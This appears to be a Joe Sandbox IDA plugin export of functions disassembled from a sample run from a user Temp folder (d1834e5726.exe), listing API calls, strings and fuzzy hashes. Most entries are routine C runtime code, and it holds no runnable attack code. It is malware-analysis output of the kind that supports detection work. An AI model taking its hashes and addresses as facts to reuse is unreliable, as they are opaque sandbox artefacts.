Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: ]CN$csm$f2N
API String ID: 1170836740-4281818672
Opcode ID: 5d4844638e47927f92a2bfe778113bafb1c193b60fec4acb271eb319e3b048ee
Instruction ID: f0ee2f20e658cd107181b30a80d5897964b80284da1c5876d360a2d0d408edd8
Opcode Fuzzy Hash: 5d4844638e47927f92a2bfe778113bafb1c193b60fec4acb271eb319e3b048ee
Instruction Fuzzy Hash: F041EA749002889BCF10DF6BC884A9E7BB1FF86316F14855BE9145B392C739AD11CBD9

Function 004F3FDE Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(01340A30,01340A30,00000000,7FFFFFFF,?,004F3FC9,01340A30,01340A30,00000000,01340A30,?,?,?,?,01340A30,00000000), ref: 004F4084
__alloca_probe_16.LIBCMT ref: 004F413F
__alloca_probe_16.LIBCMT ref: 004F41CE
__freea.LIBCMT ref: 004F4219
__freea.LIBCMT ref: 004F421F
__freea.LIBCMT ref: 004F4255
__freea.LIBCMT ref: 004F425B
__freea.LIBCMT ref: 004F426B

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: a296d6bda5d418140dac417c4e8d7d0b3db78644b4756fbc4ecde9559c25d070
Instruction ID: 8f09314e629e486dd1eb306bb9ed3d74aa021fd0bb599afa1b116f81e28217cc
Opcode Fuzzy Hash: a296d6bda5d418140dac417c4e8d7d0b3db78644b4756fbc4ecde9559c25d070
Instruction Fuzzy Hash: 3B71D23290020D6BDF209E958D81BBF77A9AF89355F16016BFB04A7381DF3D8D4187A9

Function 004EC28B Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004EC311

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6f50279ee7fba881e46e44fc6ac24256dd30adf8a6b45f72db007344eb616516
Instruction ID: 78f12f27d62d3ded8f5f901ff6426e784df0c48a370059c5c665017b964e3206
Opcode Fuzzy Hash: 6f50279ee7fba881e46e44fc6ac24256dd30adf8a6b45f72db007344eb616516
Instruction Fuzzy Hash: 24B158729002E5AFDB118F6ACCC1BBF7BA5EF55311F144157E904AB382D778A902C7A8

Function 004E8EC9 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 004E8FE8
CallUnexpected.LIBVCRUNTIME ref: 004E9261

Strings

csm, xrefs: 004E901F
csm, xrefs: 004E8F06
xaO, xrefs: 004E8FDF
csm, xrefs: 004E8F73

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm$xaO
API String ID: 2673424686-285699695
Opcode ID: fe507b44445b710f37649dafef10f386aa45750b2e56715376a9edeac6cf0a0c
Instruction ID: faafa6106325cdfaa9a5367462a12935de7f479949a097045fec0bf31ec3126c
Opcode Fuzzy Hash: fe507b44445b710f37649dafef10f386aa45750b2e56715376a9edeac6cf0a0c
Instruction Fuzzy Hash: 8FB18871800289EFCF14DFA6C8849AEB7B9BF04306F14459FE8156B282D739DE51CB99

Function 004E720B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,98F3976D,?,?,00000000,004F5CA3,000000FF,?,004E72CC,00000002,?,004E7368,004E84AD), ref: 004E7240
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004E7252
FreeLibrary.KERNEL32(00000000,?,?,00000000,004F5CA3,000000FF,?,004E72CC,00000002,?,004E7368,004E84AD), ref: 004E7274

Strings

CorExitProcess, xrefs: 004E724A
mscoree.dll, xrefs: 004E7239
f2N, xrefs: 004E7263

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$f2N$mscoree.dll
API String ID: 4061214504-910826858
Opcode ID: 2355bfe69f99ae440f8c8e13b386a9891451ca7418b5b0231942854c0adb9b52
Instruction ID: dbb457a70cc5ad449ec3bf9d0adc6983b1f1e46cacdda80b76889d0e0767bceb
Opcode Fuzzy Hash: 2355bfe69f99ae440f8c8e13b386a9891451ca7418b5b0231942854c0adb9b52
Instruction Fuzzy Hash: B501A27194469DAFDB118F55CD49BBEBBB8FB04B26F104936F911A22D0DB789810CB88

Function 004E3269 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004E326F
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004E327D
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004E328E

Strings

GetTempPath2W, xrefs: 004E3283
kernel32.dll, xrefs: 004E326A
GetSystemTimePreciseAsFileTime, xrefs: 004E3277

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 0bc485e53f564070ad43509a40123167d2e3e1b4e1a1a235ab05006dbdcdb1eb
Instruction ID: 030c2180853b82939f854c4c296609c96ff308b8a412d47a21f71583818a4387
Opcode Fuzzy Hash: 0bc485e53f564070ad43509a40123167d2e3e1b4e1a1a235ab05006dbdcdb1eb
Instruction Fuzzy Hash: 1ED0A7B15812986FC300AFB0BD4C9B63F95EE053403114033FA08D2310DB740421CF9D

Function 004E8639 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004E8630,004E443B,004E3B4A), ref: 004E8647
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004E8655
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E866E
SetLastError.KERNEL32(00000000,004E8630,004E443B,004E3B4A), ref: 004E86C0

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5cbce045127b9657caeab8f853b3b9c01aca35ac18037df41e9cdb7a6e7309c3
Instruction ID: 29c8696a6180125dd52c781c27b408f51fe807a7412f821642c13ef15e8dc18f
Opcode Fuzzy Hash: 5cbce045127b9657caeab8f853b3b9c01aca35ac18037df41e9cdb7a6e7309c3
Instruction Fuzzy Hash: 2701D4322083925EAE25277BBCC553B2785EB4177F720063FF518452F0EF595C21918C

Function 004E8BF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004E8CB7
___AdjustPointer.LIBCMT ref: 004E8CDA
___AdjustPointer.LIBCMT ref: 004E8D76

Strings

f2N, xrefs: 004E8C4F

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AdjustPointer
String ID: f2N
API String ID: 1740715915-3473888870
Opcode ID: 0c23ff0a8afc360b08b56ce49b60507995906ff81fe73c07b264dbcf3598928a
Instruction ID: c85decbac06da8aa923f296293e66adfa0a03cd46c206ca2bab7cd37f5dcfb1e
Opcode Fuzzy Hash: 0c23ff0a8afc360b08b56ce49b60507995906ff81fe73c07b264dbcf3598928a
Instruction Fuzzy Hash: 1951DF72A012869FEF298F53D841F7A73A4EF50307F24452FE809572D1DB38A851C7A8

Function 004EDC9B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe, xrefs: 004EDCB7

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe
API String ID: 0-3606337622
Opcode ID: 480038e1e7bcdbfddf578708c542856f88b25d234c754e125afbf6366f758249
Instruction ID: 15905a2eebc9461af385f875af3a7440a7ba6be052670de9b02c2609af68f94c
Opcode Fuzzy Hash: 480038e1e7bcdbfddf578708c542856f88b25d234c754e125afbf6366f758249
Instruction Fuzzy Hash: DE219231E00289EF9B20AF739C81D6B7768EF4036A710452BF91997250DB38EC50C799

Function 004EF1A5 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004EF22A
__alloca_probe_16.LIBCMT ref: 004EF2F3
__freea.LIBCMT ref: 004EF35A

Part of subcall function 004EB8D6: RtlAllocateHeap.NTDLL(00000000,004EAB77,?,?,004EAB77,00000220,?,00000000,?), ref: 004EB908

__freea.LIBCMT ref: 004EF36D
__freea.LIBCMT ref: 004EF37A

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 0adedcd2f944655d1316926dc85b6407fcbb3a063706d69186208696aa165213
Instruction ID: b9cc9a5541b4ef260a597690386e19837797a05c6903fd3cbacdbbed8ec6b4a5
Opcode Fuzzy Hash: 0adedcd2f944655d1316926dc85b6407fcbb3a063706d69186208696aa165213
Instruction Fuzzy Hash: B451D37260028AAFDB209F67CC81EBB76A9EF44756B15053FFD04D6250EB78CC14C668

Function 004E30C1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004E30D5
AcquireSRWLockExclusive.KERNEL32(?,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E30F4
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E3122
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E317D
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,004F5C4C,000000FF,?,004E211F), ref: 004E3194

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: cc43c2eab41b94efca16986990c753b52e64983f005bc7b139cea560e2b0b944
Instruction ID: 797ec950b60df43a2bcef84ead2ac1e664097b952eb31c4c60d1f882e8929af2
Opcode Fuzzy Hash: cc43c2eab41b94efca16986990c753b52e64983f005bc7b139cea560e2b0b944
Instruction Fuzzy Hash: B341383060068ADBCB26CF67C98896AF3B5FF05317B50892FD44697A40D738EA45CB69

Function 004E8B59 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 004E8DD0

Strings

csm, xrefs: 004E8E63
csm, xrefs: 004E8DF2
f2N, xrefs: 004E8E98

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm$f2N
API String ID: 3493665558-4118698419
Opcode ID: 87adee511c74e47a9544c913497bf5da4f48f1a3a76cf02456d6301a7d20d12d
Instruction ID: e6d59a5d26ca582b3d05a9c98b0659f1a8c9dd67b1951e8a0796d6740100b500
Opcode Fuzzy Hash: 87adee511c74e47a9544c913497bf5da4f48f1a3a76cf02456d6301a7d20d12d
Instruction Fuzzy Hash: 7D31D6318002889BCF268F9ACD4096B7B66FF1971BB14459FF85C89221CB3ADC61DB95

Function 004E1C40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registrywindowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 004E1C9D
RegisterClassW.USER32(?), ref: 004E1CB2
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004E1CDB

Strings

`O, xrefs: 004E1CA7

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ClassHandleMessageModuleRegister
String ID: `O
API String ID: 1585107554-1900571490
Opcode ID: 6addfd029342aff327c0941a4b51867e55abe4471d99fcf0700e600ec2a0d08a
Instruction ID: 8dc3b02378dbf193aca33bcfa74388ef0bf8223f888fc6e38c51fed85050d31c
Opcode Fuzzy Hash: 6addfd029342aff327c0941a4b51867e55abe4471d99fcf0700e600ec2a0d08a
Instruction Fuzzy Hash: 3421A2B1C8038D9BDB10CFA1DD45BEEBBB4FF45714F20522AE508B6250E7B81690CB98

Function 004EEEE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,004EEF82,00000000,?,004FF760,?,?,?,004EEEB9,00000004,InitializeCriticalSectionEx,004F78B0,004F78B8), ref: 004EEEF3
GetLastError.KERNEL32(?,004EEF82,00000000,?,004FF760,?,?,?,004EEEB9,00000004,InitializeCriticalSectionEx,004F78B0,004F78B8,00000000,?,004E951C), ref: 004EEEFD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 004EEF25

Strings

api-ms-, xrefs: 004EEF0A

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: aefb92c1cd499ee75fc578f8b51b5180f78d651b4c4020f5c9c1f54ce3afe991
Instruction ID: ba38d6b1142de347ce68c22e378a92d5380a1ccedae0f9ba115d150138edeedd
Opcode Fuzzy Hash: aefb92c1cd499ee75fc578f8b51b5180f78d651b4c4020f5c9c1f54ce3afe991
Instruction Fuzzy Hash: 1AE01A3168428CB6EB105B62ED46F793E56EB08B56F104031F90CA81E1DB66A820994C

Function 004EF86C Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(98F3976D,00000000,00000000,?), ref: 004EF8CF

Part of subcall function 004EE356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004EF350,?,00000000,-00000008), ref: 004EE3B7

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004EFB21
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004EFB67
GetLastError.KERNEL32 ref: 004EFC0A

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: ff896ca65fe88481f101e41b637f206f207c4bdfc0f510fd82fc1965079f89d0
Instruction ID: b793e5a9952eae2cf7b9177b4b0e31a34aa1ca067f5899218f95f312baaff20b
Opcode Fuzzy Hash: ff896ca65fe88481f101e41b637f206f207c4bdfc0f510fd82fc1965079f89d0
Instruction Fuzzy Hash: 4AD1AEB5D00288AFCF14CFA9D880AEEBBB5FF09305F24412AE956EB351D734A945CB54

Function 004ED6FF Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 004EE356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004EF350,?,00000000,-00000008), ref: 004EE3B7

GetLastError.KERNEL32(?,?,?,00000000,00000000,?,004EDAA5,?,?,?,00000000), ref: 004ED763
__dosmaperr.LIBCMT ref: 004ED76A
GetLastError.KERNEL32(00000000,004EDAA5,?,?,00000000,?,?,?,00000000,00000000,?,004EDAA5,?,?,?,00000000), ref: 004ED7A4
__dosmaperr.LIBCMT ref: 004ED7AB

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 0f7e7dfd34060a2fc57e44d54c8e29918d82cb19408f0a6224e4e71fc56b7bc5
Instruction ID: ffb8b0524311f2daf323266539626af169298d38041e3eac8c582f8a366b4416
Opcode Fuzzy Hash: 0f7e7dfd34060a2fc57e44d54c8e29918d82cb19408f0a6224e4e71fc56b7bc5
Instruction Fuzzy Hash: EC21D771A00285AFDB20AF77D88182BB7A9FF4436A710852FF91987250D738EC408799

Function 004EE452 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004EE45A

Part of subcall function 004EE356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004EF350,?,00000000,-00000008), ref: 004EE3B7

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EE492
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EE4B2

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
